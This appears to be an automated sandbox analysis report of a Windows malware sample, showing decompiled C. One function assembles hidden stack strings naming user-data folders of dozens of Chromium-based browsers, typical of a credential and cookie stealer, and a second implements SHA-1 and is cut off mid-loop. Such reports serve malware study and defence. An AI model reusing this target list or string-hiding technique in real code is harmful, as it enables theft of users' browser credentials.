                  				intOrPtr _v768;
                  				char _v772;
                  				short _v776;
                  				intOrPtr _v780;
                  				intOrPtr _v784;
                  				intOrPtr _v788;
                  				intOrPtr _v792;
                  				intOrPtr _v796;
                  				intOrPtr _v800;
                  				intOrPtr _v804;
                  				char _v808;
                  				intOrPtr _v812;
                  				char _v816;
                  				short _v820;
                  				intOrPtr _v824;
                  				intOrPtr _v828;
                  				intOrPtr _v832;
                  				intOrPtr _v836;
                  				intOrPtr _v840;
                  				intOrPtr _v844;
                  				intOrPtr _v848;
                  				intOrPtr _v852;
                  				intOrPtr _v856;
                  				intOrPtr _v860;
                  				char _v864;
                  				short _v868;
                  				intOrPtr _v872;
                  				intOrPtr _v876;
                  				intOrPtr _v880;
                  				intOrPtr _v884;
                  				intOrPtr _v888;
                  				intOrPtr _v892;
                  				intOrPtr _v896;
                  				intOrPtr _v900;
                  				intOrPtr _v904;
                  				intOrPtr _v908;
                  				char _v912;
                  				intOrPtr _v916;
                  				intOrPtr _v920;
                  				intOrPtr _v924;
                  				intOrPtr _v928;
                  				intOrPtr _v932;
                  				intOrPtr _v936;
                  				intOrPtr _v940;
                  				intOrPtr _v944;
                  				intOrPtr _v948;
                  				intOrPtr _v952;
                  				intOrPtr _v956;
                  				intOrPtr _v960;
                  				char _v964;
                  				intOrPtr _v968;
                  				intOrPtr _v972;
                  				intOrPtr _v976;
                  				intOrPtr _v980;
                  				intOrPtr _v984;
                  				intOrPtr _v988;
                  				intOrPtr _v992;
                  				intOrPtr _v996;
                  				intOrPtr _v1000;
                  				intOrPtr _v1004;
                  				intOrPtr _v1008;
                  				intOrPtr _v1012;
                  				intOrPtr _v1016;
                  				char _v1020;
                  				intOrPtr _v1024;
                  				intOrPtr _v1028;
                  				intOrPtr _v1032;
                  				intOrPtr _v1036;
                  				intOrPtr _v1040;
                  				intOrPtr _v1044;
                  				intOrPtr _v1048;
                  				intOrPtr _v1052;
                  				intOrPtr _v1056;
                  				intOrPtr _v1060;
                  				intOrPtr _v1064;
                  				intOrPtr _v1068;
                  				intOrPtr _v1072;
                  				intOrPtr _v1076;
                  				intOrPtr _v1080;
                  				char _v1084;
                  				char _v1126;
                  				short _v1128;
                  				intOrPtr _v1132;
                  				intOrPtr _v1136;
                  				intOrPtr _v1140;
                  				intOrPtr _v1144;
                  				char _v1148;
                  				void* __esi;
                  				signed int _t496;
                  				signed int _t509;
                  				signed int _t510;
                  				signed int _t643;
                  				intOrPtr _t766;
                  				intOrPtr _t767;
                  
                  				_t766 = _a4;
                  				_t767 =  *((intOrPtr*)(_t766 + 0xb8c));
                  				if(_t767 != 0) {
                  					E0115FAA7(_t767, 0x18b4);
                  					_t496 = E0115C2E7(_t766, 0x16);
                  					 *(_t767 + 0x18b0) = _t496;
                  					__eflags = _t496;
                  					if(_t496 == 0) {
                  						goto L1;
                  					} else {
                  						_v1148 = 0x55005c;
                  						_v1144 = 0x650073;
                  						_v1140 = 0x200072;
                  						_v1136 = 0x610044;
                  						_v1132 = 0x610074;
                  						_v1128 = 0;
                  						E0115FAF7( &_v1126, 0, 0x2a);
                  						_t13 = E0115FC77( &_v1148) + 2; // 0x2
                  						E0115FA77(_t767 + 4,  &_v1148, _t500 + _t13);
                  						_t647 = _t767 + 0x14a0;
                  						E0114C667(_t767 + 0x14a0, _t767, __eflags, _t766, _t767 + 0x14a0, 3, 0);
                  						E0114C667(_t767 + 0x14a0, _t767, __eflags, _t766, _t767 + 0x16a8, 1, 0);
                  						 *(_t767 + 0x1498) = E0115FC77(_t647);
                  						 *(_t767 + 0x149c) = E0115FC77(_t767 + 0x16a8);
                  						_t509 =  *(_t767 + 0x1498);
                  						__eflags = _t509;
                  						if(_t509 != 0) {
                  							__eflags =  *((short*)(_t767 + 0x149e + _t509 * 2)) - 0x5c;
                  							if( *((short*)(_t767 + 0x149e + _t509 * 2)) != 0x5c) {
                  								 *((short*)(_t767 + 0x14a0 + _t509 * 2)) = 0x5c;
                  								_t28 = _t767 + 0x1498;
                  								 *_t28 =  *(_t767 + 0x1498) + 1;
                  								__eflags =  *_t28;
                  							}
                  						}
                  						_t510 =  *(_t767 + 0x149c);
                  						__eflags = _t510;
                  						if(_t510 != 0) {
                  							__eflags =  *((short*)(_t767 + 0x16a6 + _t510 * 2)) - 0x5c;
                  							if( *((short*)(_t767 + 0x16a6 + _t510 * 2)) != 0x5c) {
                  								 *((short*)(_t767 + 0x16a8 + _t510 * 2)) = 0x5c;
                  								_t37 = _t767 + 0x149c;
                  								 *_t37 =  *(_t767 + 0x149c) + 1;
                  								__eflags =  *_t37;
                  							}
                  						}
                  						_v292 = 0x560041;
                  						_v288 = 0x5c0047;
                  						_v284 = 0x720042;
                  						_v280 = 0x77006f;
                  						_v276 = 0x650073;
                  						_v272 = 0x72;
                  						_t47 = E0115FC77( &_v292) + 2; // 0x2
                  						E0115FA77(_t767 + 0x4d8,  &_v292, _t512 + _t47);
                  						_v28 = 0x69004b;
                  						_v24 = 0x7a006e;
                  						_v20 = 0x61;
                  						_t55 = E0115FC77( &_v28) + 2; // 0x2
                  						E0115FA77(_t767 + 0x518,  &_v28, _t515 + _t55);
                  						_v244 = 0x520055;
                  						_v240 = 0x720042;
                  						_v236 = 0x77006f;
                  						_v232 = 0x650073;
                  						_v228 = 0x72;
                  						_t65 = E0115FC77( &_v244) + 2; // 0x2
                  						E0115FA77(_t767 + 0x558,  &_v244, _t519 + _t65);
                  						_v912 = 0x560041;
                  						_v908 = 0x530041;
                  						_v904 = 0x200054;
                  						_v900 = 0x6f0053;
                  						_v896 = 0x740066;
                  						_v892 = 0x610077;
                  						_v888 = 0x650072;
                  						_v884 = 0x42005c;
                  						_v880 = 0x6f0072;
                  						_v876 = 0x730077;
                  						_v872 = 0x720065;
                  						_v868 = 0;
                  						_t82 = E0115FC77( &_v912) + 2; // 0x2
                  						E0115FA77(_t767 + 0x598,  &_v912, _t523 + _t82);
                  						_v204 = 0x610053;
                  						_v200 = 0x61006c;
                  						_v196 = 0x57006d;
                  						_v192 = 0x620065;
                  						_v188 = 0;
                  						_t92 = E0115FC77( &_v204) + 2; // 0x2
                  						E0115FA77(_t767 + 0x5d8,  &_v204, _t527 + _t92);
                  						_v604 = 0x430043;
                  						_v600 = 0x65006c;
                  						_v596 = 0x6e0061;
                  						_v592 = 0x720065;
                  						_v588 = 0x420020;
                  						_v584 = 0x6f0072;
                  						_v580 = 0x730077;
                  						_v576 = 0x720065;
                  						_v572 = 0;
                  						_t106 = E0115FC77( &_v604) + 2; // 0x2
                  						E0115FA77(_t767 + 0x618,  &_v604, _t531 + _t106);
                  						_v500 = 0x70004f;
                  						_v496 = 0x720065;
                  						_v492 = 0x200061;
                  						_v488 = 0x6f0053;
                  						_v484 = 0x740066;
                  						_v480 = 0x610077;
                  						_v476 = 0x650072;
                  						_v472 = 0;
                  						E0115FA77(_t767 + 0x658,  &_v500, E0115FC77( &_v500) + _t534 + 2);
                  						_v684 = 0x610059;
                  						_v680 = 0x64006e;
                  						_v676 = 0x780065;
                  						_v672 = 0x59005c;
                  						_v668 = 0x6e0061;
                  						_v664 = 0x650064;
                  						_v660 = 0x420078;
                  						_v656 = 0x6f0072;
                  						_v652 = 0x730077;
                  						_v648 = 0x720065;
                  						_v644 = 0;
                  						_t135 = E0115FC77( &_v684) + 2; // 0x2
                  						E0115FA77(_t767 + 0x698,  &_v684, _t538 + _t135);
                  						_v148 = 0x6c0053;
                  						_v144 = 0x6d0069;
                  						_v140 = 0x65006a;
                  						_v136 = 0x74;
                  						_t144 = E0115FC77( &_v148) + 2; // 0x2
                  						E0115FA77(_t767 + 0x6d8,  &_v148, _t542 + _t144);
                  						_v568 = 0x360033;
                  						_v564 = 0x430030;
                  						_v560 = 0x720068;
                  						_v556 = 0x6d006f;
                  						_v552 = 0x5c0065;
                  						_v548 = 0x680043;
                  						_v544 = 0x6f0072;
                  						_v540 = 0x65006d;
                  						_v536 = 0;
                  						_t158 = E0115FC77( &_v568) + 2; // 0x2
                  						E0115FA77(_t767 + 0x718,  &_v568, _t546 + _t158);
                  						_v344 = 0x6f0043;
                  						_v340 = 0x6f006d;
                  						_v336 = 0x6f0064;
                  						_v332 = 0x44005c;
                  						_v328 = 0x610072;
                  						_v324 = 0x6f0067;
                  						_v320 = 0x6e;
                  						_t170 = E0115FC77( &_v344) + 2; // 0x2
                  						E0115FA77(_t767 + 0x758,  &_v344, _t550 + _t170);
                  						_v864 = 0x61004d;
                  						_v860 = 0x6c0070;
                  						_v856 = 0x530065;
                  						_v852 = 0x750074;
                  						_v848 = 0x690064;
                  						_v844 = 0x5c006f;
                  						_v840 = 0x680043;
                  						_v836 = 0x6f0072;
                  						_v832 = 0x65006d;
                  						_v828 = 0x6c0050;
                  						_v824 = 0x730075;
                  						_v820 = 0;
                  						_t187 = E0115FC77( &_v864) + 2; // 0x2
                  						E0115FA77(_t767 + 0x798,  &_v864, _t554 + _t187);
                  						_v184 = 0x680043;
                  						_v180 = 0x6f0072;
                  						_v176 = 0x69006d;
                  						_v172 = 0x6d0075;
                  						_v168 = 0;
                  						_t197 = E0115FC77( &_v184) + 2; // 0x2
                  						E0115FA77(_t767 + 0x7d8,  &_v184, _t558 + _t197);
                  						_v52 = 0x6f0054;
                  						_v48 = 0x630072;
                  						_v44 = 0x68;
                  						E0115FA77(_t767 + 0x818,  &_v52, E0115FC77( &_v52) + _t561 + 2);
                  						_v1020 = 0x720042;
                  						_v1016 = 0x760061;
                  						_v1012 = 0x530065;
                  						_v1008 = 0x66006f;
                  						_v1004 = 0x770074;
                  						_v1000 = 0x720061;
                  						_v996 = 0x5c0065;
                  						_v992 = 0x720042;
                  						_v988 = 0x760061;
                  						_v984 = 0x2d0065;
                  						_v980 = 0x720042;
                  						_v976 = 0x77006f;
                  						_v972 = 0x650073;
                  						_v968 = 0x72;
                  						_t224 = E0115FC77( &_v1020) + 2; // 0x2
                  						E0115FA77(_t767 + 0x858,  &_v1020, _t564 + _t224);
                  						_v116 = 0x720049;
                  						_v112 = 0x640069;
                  						_v108 = 0x750069;
                  						_v104 = 0x6d;
                  						_t233 = E0115FC77( &_v116) + 2; // 0x2
                  						E0115FA77(_t767 + 0x898,  &_v116, _t567 + _t233);
                  						_v964 = 0x70004f;
                  						_v960 = 0x720065;
                  						_v956 = 0x200061;
                  						_v952 = 0x6f0053;
                  						_v948 = 0x740066;
                  						_v944 = 0x610077;
                  						_v940 = 0x650072;
                  						_v936 = 0x4f005c;
                  						_v932 = 0x650070;
                  						_v928 = 0x610072;
                  						_v924 = 0x4e0020;
                  						_v920 = 0x6f0065;
                  						_v916 = 0x6e;
                  						_t251 = E0115FC77( &_v964) + 2; // 0x2
                  						E0115FA77(_t767 + 0x8d8,  &_v964, _t570 + _t251);
                  						_v268 = 0x530037;
                  						_v264 = 0x610074;
                  						_v260 = 0x5c0072;
                  						_v256 = 0x530037;
                  						_v252 = 0x610074;
                  						_v248 = 0x72;
                  						E0115FA77(_t767 + 0x918,  &_v268, E0115FC77( &_v268) + _t573 + 2);
                  						_v40 = 0x6d0041;
                  						_v36 = 0x670069;
                  						_v32 = 0x6f;
                  						_t270 = E0115FC77( &_v40) + 2; // 0x2
                  						E0115FA77(_t767 + 0x958,  &_v40, _t577 + _t270);
                  						_v16 = 0x6c0042;
                  						_v12 = 0x730069;
                  						_v8 = 0x6b;
                  						_t278 = E0115FC77( &_v16) + 2; // 0x2
                  						E0115FA77(_t767 + 0x998,  &_v16, _t580 + _t278);
                  						_v316 = 0x650043;
                  						_v312 = 0x74006e;
                  						_v308 = 0x720042;
                  						_v304 = 0x77006f;
                  						_v300 = 0x650073;
                  						_v296 = 0x72;
                  						E0115FA77(_t767 + 0x9d8,  &_v316, E0115FC77( &_v316) + _t583 + 2);
                  						_v68 = 0x680043;
                  						_v64 = 0x640065;
                  						_v60 = 0x74006f;
                  						_v56 = 0;
                  						_t298 = E0115FC77( &_v68) + 2; // 0x2
                  						E0115FA77(_t767 + 0xa18,  &_v68, _t587 + _t298);
                  						_v468 = 0x6f0043;
                  						_v464 = 0x430063;
                  						_v460 = 0x63006f;
                  						_v456 = 0x42005c;
                  						_v452 = 0x6f0072;
                  						_v448 = 0x730077;
                  						_v444 = 0x720065;
                  						_v440 = 0;
                  						E0115FA77(_t767 + 0xa58,  &_v468, E0115FC77( &_v468) + _t590 + 2);
                  						_v640 = 0x6c0045;
                  						_v636 = 0x6d0065;
                  						_v632 = 0x6e0065;
                  						_v628 = 0x730074;
                  						_v624 = 0x420020;
                  						_v620 = 0x6f0072;
                  						_v616 = 0x730077;
                  						_v612 = 0x720065;
                  						_v608 = 0;
                  						E0115FA77(_t767 + 0xa98,  &_v640, E0115FC77( &_v640) + _t593 + 2);
                  						_v772 = 0x700045;
                  						_v768 = 0x630069;
                  						_v764 = 0x500020;
                  						_v760 = 0x690072;
                  						_v756 = 0x610076;
                  						_v752 = 0x790063;
                  						_v748 = 0x420020;
                  						_v744 = 0x6f0072;
                  						_v740 = 0x730077;
                  						_v736 = 0x720065;
                  						_v732 = 0;
                  						_t341 = E0115FC77( &_v772) + 2; // 0x2
                  						E0115FA77(_t767 + 0xad8,  &_v772, _t597 + _t341);
                  						_v84 = 0x6f004b;
                  						_v80 = 0x65006d;
                  						_v76 = 0x610074;
                  						_v72 = 0;
                  						E0115FA77(_t767 + 0xb18,  &_v84, E0115FC77( &_v84) + _t600 + 2);
                  						_v132 = 0x72004f;
                  						_v128 = 0x690062;
                  						_v124 = 0x750074;
                  						_v120 = 0x6d;
                  						E0115FA77(_t767 + 0xb58,  &_v132, E0115FC77( &_v132) + _t603 + 2);
                  						_v532 = 0x700053;
                  						_v528 = 0x740075;
                  						_v524 = 0x69006e;
                  						_v520 = 0x5c006b;
                  						_v516 = 0x700053;
                  						_v512 = 0x740075;
                  						_v508 = 0x69006e;
                  						_v504 = 0x6b;
                  						_t372 = E0115FC77( &_v532) + 2; // 0x2
                  						E0115FA77(_t767 + 0xb98,  &_v532, _t606 + _t372);
                  						_v436 = 0x430075;
                  						_v432 = 0x7a006f;
                  						_v428 = 0x65004d;
                  						_v424 = 0x690064;
                  						_v420 = 0x5c0061;
                  						_v416 = 0x720055;
                  						_v412 = 0x6e0061;
                  						_v408 = 0;
                  						E0115FA77(_t767 + 0xbd8,  &_v436, E0115FC77( &_v436) + _t609 + 2);
                  						_v728 = 0x650046;
                  						_v724 = 0x72006e;
                  						_v720 = 0x720069;
                  						_v716 = 0x490020;
                  						_v712 = 0x63006e;
                  						_v708 = 0x53005c;
                  						_v704 = 0x65006c;
                  						_v700 = 0x700069;
                  						_v696 = 0x69006e;
                  						_v692 = 0x350072;
                  						_v688 = 0;
                  						_t401 = E0115FC77( &_v728) + 2; // 0x2
                  						E0115FA77(_t767 + 0xc18,  &_v728, _t613 + _t401);
                  						_v816 = 0x610043;
                  						_v812 = 0x610074;
                  						_v808 = 0x69006c;
                  						_v804 = 0x61006e;
                  						_v800 = 0x720047;
                  						_v796 = 0x75006f;
                  						_v792 = 0x5c0070;
                  						_v788 = 0x690043;
                  						_v784 = 0x720074;
                  						_v780 = 0x6f0069;
                  						_v776 = 0;
                  						_t417 = E0115FC77( &_v816) + 2; // 0x2
                  						E0115FA77(_t767 + 0xc58,  &_v816, _t617 + _t417);
                  						_v372 = 0x6f0043;
                  						_v368 = 0x77006f;
                  						_v364 = 0x6e006f;
                  						_v360 = 0x43005c;
                  						_v356 = 0x6f006f;
                  						_v352 = 0x6f0077;
                  						_v348 = 0x6e;
                  						_t429 = E0115FC77( &_v372) + 2; // 0x2
                  						E0115FA77(_t767 + 0xc98,  &_v372, _t620 + _t429);
                  						_v100 = 0x69006c;
                  						_v96 = 0x620065;
                  						_v92 = 0x6f0061;
                  						_v88 = 0;
                  						_t438 = E0115FC77( &_v100) + 2; // 0x2
                  						E0115FA77(_t767 + 0xcd8,  &_v100, _t624 + _t438);
                  						_v224 = 0x490051;
                  						_v220 = 0x200050;
                  						_v216 = 0x750053;
                  						_v212 = 0x660072;
                  						_v208 = 0;
                  						_t448 = E0115FC77( &_v224) + 2; // 0x2
                  						E0115FA77(_t767 + 0xd18,  &_v224, _t628 + _t448);
                  						_v404 = 0x69004d;
                  						_v400 = 0x720063;
                  						_v396 = 0x73006f;
                  						_v392 = 0x66006f;
                  						_v388 = 0x5c0074;
                  						_v384 = 0x640045;
                  						_v380 = 0x650067;
                  						_v376 = 0;
                  						E0115FA77(_t767 + 0xd58,  &_v404, E0115FC77( &_v404) + _t631 + 2);
                  						_v164 = 0x690056;
                  						_v160 = 0x610076;
                  						_v156 = 0x64006c;
                  						_v152 = 0x69;
                  						E0115FA77(_t767 + 0xd98,  &_v164, E0115FC77( &_v164) + _t634 + 2);
                  						_v1084 = 0xa000d;
                  						_v1080 = 0x680043;
                  						_v1076 = 0x6f0072;
                  						_v1072 = 0x69006d;
                  						_v1068 = 0x6d0075;
                  						_v1064 = 0x520020;
                  						_v1040 = 0;
                  						_v1036 = 0;
                  						_v1032 = 0;
                  						_v1028 = 0;
                  						_v1024 = 0;
                  						_v1060 = 0x630065;
                  						_v1056 = 0x76006f;
                  						_v1052 = 0x720065;
                  						_v1048 = 0xd0079;
                  						_v1044 = 0xa;
                  						_t490 = E0115FC77( &_v1084) + 2; // 0x2
                  						E0115FA77( *((intOrPtr*)(_t766 + 0xa08)),  &_v1084, _t639 + _t490);
                  						_t643 = E0115FC77( *((intOrPtr*)(_t766 + 0xa08))) + _t642;
                  						__eflags = _t643;
                  						 *(_t766 + 0xa0c) = _t643;
                  						E0114F157(_t766, 9);
                  						return 1;
                  					}
                  				} else {
                  					L1:
                  					return 0;
                  				}
                  			}

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $ $ $ $ $ $ $0$3$7$7$A$A$A$A$B$B$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$D$E$E$E$F$G$G$I$K$K$M$M$M$O$O$O$P$P$Q$S$S$S$S$S$S$S$S$T$T$U$U$V$Y$\$\$\$\$\$\$\$\$a$a$a$a$a$a$a$a$a$a$a$b$c$c$c$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$f$f$f$g$g$h$h$i$i$i$i$i$i$i$i$i$i$j$k$k$k$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$v$v$w$w$w$w$w$w$w$w$w$w$x$y
                  • API String ID: 0-2578923714
                  • Opcode ID: 23d78bcf7e35131c5569bf9615cae1d997e9e7eb3126ac5fd744440a7427ca45
                  • Instruction ID: 0006e3867295126f63f5c5b263e59e511d2248d552d1a9f6615473619e395e1d
                  • Opcode Fuzzy Hash: 23d78bcf7e35131c5569bf9615cae1d997e9e7eb3126ac5fd744440a7427ca45
                  • Instruction Fuzzy Hash: 569209B1801329DEDB69DF50C848BEABBB9BF04708F0085DD951D6A211DBB55BC8CFA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 72%
                  			E0114B452(void* __edx, intOrPtr* _a4) {
                  				signed int* _v4;
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				char _v304;
                  				signed char* _t277;
                  				signed int* _t278;
                  				signed int _t279;
                  				signed int _t285;
                  				signed int _t288;
                  				signed int _t292;
                  				signed int _t295;
                  				signed int _t299;
                  				signed int _t303;
                  				signed int _t305;
                  				intOrPtr _t311;
                  				signed int _t319;
                  				signed int _t321;
                  				signed int _t324;
                  				signed int _t326;
                  				signed int _t335;
                  				signed int _t341;
                  				signed int _t342;
                  				signed int _t347;
                  				signed int _t355;
                  				signed int _t359;
                  				signed int _t360;
                  				signed int _t364;
                  				signed int _t367;
                  				signed int _t371;
                  				signed int _t372;
                  				signed int _t403;
                  				signed int _t408;
                  				signed int _t414;
                  				signed int _t417;
                  				signed int _t424;
                  				signed int _t427;
                  				signed int _t436;
                  				signed int _t438;
                  				signed int _t441;
                  				signed int _t449;
                  				signed int _t464;
                  				signed int _t467;
                  				signed int _t468;
                  				signed int _t469;
                  				signed int _t475;
                  				signed int _t483;
                  				signed int _t484;
                  				intOrPtr* _t485;
                  				signed int* _t488;
                  				signed int _t495;
                  				signed int _t498;
                  				signed int _t503;
                  				signed int _t506;
                  				signed int _t509;
                  				signed int _t512;
                  				signed int _t513;
                  				signed int _t517;
                  				signed int _t529;
                  				signed int _t532;
                  				signed int _t539;
                  				void* _t545;
                  				void* _t547;
                  
                  				_push(0xffffffc8);
                  				_push(_t544);
                  				_t545 = _t547;
                  				_t488 = _v4;
                  				_t355 = 0;
                  				_t2 =  &(_t488[7]); // 0xe909
                  				_t277 = _t2;
                  				do {
                  					 *(_t545 + _t355 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
                  					 *(_t545 + _t355 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
                  					 *(_t545 + _t355 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
                  					 *(_t545 + _t355 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
                  					_t355 = _t355 + 4;
                  					_t277 =  &(_t277[0x10]);
                  				} while (_t355 < 0x10);
                  				_t278 =  &_v304;
                  				_v8 = 0x10;
                  				do {
                  					_t403 =  *(_t278 - 0x18);
                  					_t464 =  *(_t278 - 0x14);
                  					_t359 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t403;
                  					asm("rol ecx, 1");
                  					asm("rol ebx, 1");
                  					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t464;
                  					_t278[8] = _t359;
                  					_t319 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
                  					_t278 =  &(_t278[4]);
                  					asm("rol ebx, 1");
                  					asm("rol edx, 1");
                  					_t46 =  &_v8;
                  					 *_t46 = _v8 - 1;
                  					_t278[6] = _t319 ^ _t403;
                  					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t359 ^ _t464;
                  				} while ( *_t46 != 0);
                  				_t321 =  *_t488;
                  				_t279 = _t488[1];
                  				_t360 = _t488[2];
                  				_t408 = _t488[3];
                  				_v12 = _t321;
                  				_v16 = _t488[4];
                  				_v8 = 0;
                  				do {
                  					asm("rol ebx, 0x5");
                  					_t467 = _v8;
                  					_t495 = _t321 + ( !_t279 & _t408 | _t360 & _t279) +  *((intOrPtr*)(_t545 + _t467 * 4 - 0x14c)) + _v16 + 0x5a827999;
                  					_t324 = _v12;
                  					asm("ror eax, 0x2");
                  					_v16 = _t408;
                  					_v12 = _t495;
                  					asm("rol esi, 0x5");
                  					_v8 = _t360;
                  					_t414 = _t495 + ( !_t324 & _t360 | _t279 & _t324) +  *((intOrPtr*)(_t545 + _t467 * 4 - 0x148)) + _v16 + 0x5a827999;
                  					_t498 = _t279;
                  					asm("ror ebx, 0x2");
                  					_v16 = _v8;
                  					_t364 = _v12;
                  					_v8 = _t324;
                  					_t326 = _v8;
                  					_v12 = _t414;
                  					asm("rol edx, 0x5");
                  					_t285 = _t414 + ( !_t364 & _t498 | _t324 & _t364) +  *((intOrPtr*)(_t545 + _t467 * 4 - 0x144)) + _v16 + 0x5a827999;
                  					_t417 = _v12;
                  					_v16 = _t498;
                  					asm("ror ecx, 0x2");
                  					_v8 = _t364;
                  					_v12 = _t285;
                  					asm("rol eax, 0x5");
                  					_v16 = _t326;
                  					_t503 = _t285 + ( !_t417 & _t326 | _t364 & _t417) +  *((intOrPtr*)(_t545 + _t467 * 4 - 0x140)) + _v16 + 0x5a827999;
                  					_t360 = _v12;
                  					_t288 = _v8;
                  					asm("ror edx, 0x2");
                  					_v8 = _t417;
                  					_v12 = _t503;
                  					asm("rol esi, 0x5");
                  					_v16 = _t288;
                  					_t279 = _v12;
                  					_t506 = _t503 + ( !_t360 & _t288 | _t417 & _t360) +  *((intOrPtr*)(_t545 + _t467 * 4 - 0x13c)) + _v16 + 0x5a827999;
                  					_t408 = _v8;
                  					asm("ror ecx, 0x2");
                  					_t468 = _t467 + 5;
                  					_t321 = _t506;
                  					_v12 = _t321;
                  					_v8 = _t468;
                  				} while (_t468 < 0x14);
                  				_t469 = 0x14;
                  				do {
                  					asm("rol esi, 0x5");
                  					asm("ror eax, 0x2");
                  					_v16 = _t408;
                  					_t509 = _t506 + (_t408 ^ _t360 ^ _t279) +  *((intOrPtr*)(_t545 + _t469 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                  					_t335 = _v12;
                  					_v12 = _t509;
                  					asm("rol esi, 0x5");
                  					_t424 = _t509 + (_t360 ^ _t279 ^ _t335) +  *((intOrPtr*)(_t545 + _t469 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                  					asm("ror ebx, 0x2");
                  					_t512 = _t279;
                  					_v16 = _t360;
                  					_t367 = _v12;
                  					_v12 = _t424;
                  					asm("rol edx, 0x5");
                  					asm("ror ecx, 0x2");
                  					_t292 = _t424 + (_t279 ^ _t335 ^ _t367) +  *((intOrPtr*)(_t545 + _t469 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                  					_t427 = _v12;
                  					_v8 = _t335;
                  					_v8 = _t367;
                  					_v12 = _t292;
                  					asm("rol eax, 0x5");
                  					_t469 = _t469 + 5;
                  					_t360 = _v12;
                  					asm("ror edx, 0x2");
                  					_t146 = _t512 + 0x6ed9eba1; // 0x6edad48d
                  					_t513 = _t292 + (_t335 ^ _v8 ^ _t427) +  *((intOrPtr*)(_t545 + _t469 * 4 - 0x154)) + _t146;
                  					_t295 = _v8;
                  					_v8 = _t427;
                  					_v12 = _t513;
                  					asm("rol esi, 0x5");
                  					_t408 = _v8;
                  					_t506 = _t513 + (_t295 ^ _v8 ^ _t360) +  *((intOrPtr*)(_t545 + _t469 * 4 - 0x150)) + _t335 + 0x6ed9eba1;
                  					_v16 = _t295;
                  					_t279 = _v12;
                  					asm("ror ecx, 0x2");
                  					_v12 = _t506;
                  				} while (_t469 < 0x28);
                  				_v8 = 0x28;
                  				do {
                  					asm("rol esi, 0x5");
                  					_v16 = _t408;
                  					asm("ror eax, 0x2");
                  					_t517 = ((_t360 | _t279) & _t408 | _t360 & _t279) +  *((intOrPtr*)(_t545 + _v8 * 4 - 0x14c)) + _t506 + _v16 - 0x70e44324;
                  					_t475 = _v12;
                  					_v12 = _t517;
                  					asm("rol esi, 0x5");
                  					_t341 = _v8;
                  					asm("ror edi, 0x2");
                  					_t436 = ((_t279 | _t475) & _t360 | _t279 & _t475) +  *((intOrPtr*)(_t545 + _t341 * 4 - 0x148)) + _t517 + _v16 - 0x70e44324;
                  					_v16 = _t360;
                  					_t371 = _v12;
                  					_v12 = _t436;
                  					asm("rol edx, 0x5");
                  					_v8 = _t279;
                  					_t438 = ((_t475 | _t371) & _t279 | _t475 & _t371) +  *((intOrPtr*)(_t545 + _t341 * 4 - 0x144)) + _t436 + _v16 - 0x70e44324;
                  					asm("ror ecx, 0x2");
                  					_v16 = _v8;
                  					_t299 = _v12;
                  					_v8 = _t475;
                  					_v12 = _t438;
                  					asm("rol edx, 0x5");
                  					asm("ror eax, 0x2");
                  					_t529 = ((_t371 | _t299) & _t475 | _t371 & _t299) +  *((intOrPtr*)(_t545 + _t341 * 4 - 0x140)) + _t438 + _v16 - 0x70e44324;
                  					_v16 = _v8;
                  					_t441 = _t371;
                  					_t360 = _v12;
                  					_v8 = _t441;
                  					_v12 = _t529;
                  					asm("rol esi, 0x5");
                  					_v16 = _v8;
                  					_t506 = ((_t299 | _t360) & _t441 | _t299 & _t360) +  *((intOrPtr*)(_t545 + _t341 * 4 - 0x13c)) + _t529 + _v16 - 0x70e44324;
                  					_t408 = _t299;
                  					_t279 = _v12;
                  					asm("ror ecx, 0x2");
                  					_v12 = _t506;
                  					_t342 = _t341 + 5;
                  					_v8 = _t342;
                  				} while (_t342 < 0x3c);
                  				_t483 = 0x3c;
                  				_v8 = 0x3c;
                  				do {
                  					asm("rol esi, 0x5");
                  					_t484 = _v8;
                  					asm("ror eax, 0x2");
                  					_t532 = (_t408 ^ _t360 ^ _t279) +  *((intOrPtr*)(_t545 + _t483 * 4 - 0x14c)) + _t506 + _v16 - 0x359d3e2a;
                  					_t347 = _v12;
                  					_v16 = _t408;
                  					_v12 = _t532;
                  					asm("rol esi, 0x5");
                  					asm("ror ebx, 0x2");
                  					_t449 = (_t360 ^ _t279 ^ _t347) +  *((intOrPtr*)(_t545 + _t484 * 4 - 0x148)) + _t532 + _v16 - 0x359d3e2a;
                  					_v16 = _t360;
                  					_t372 = _v12;
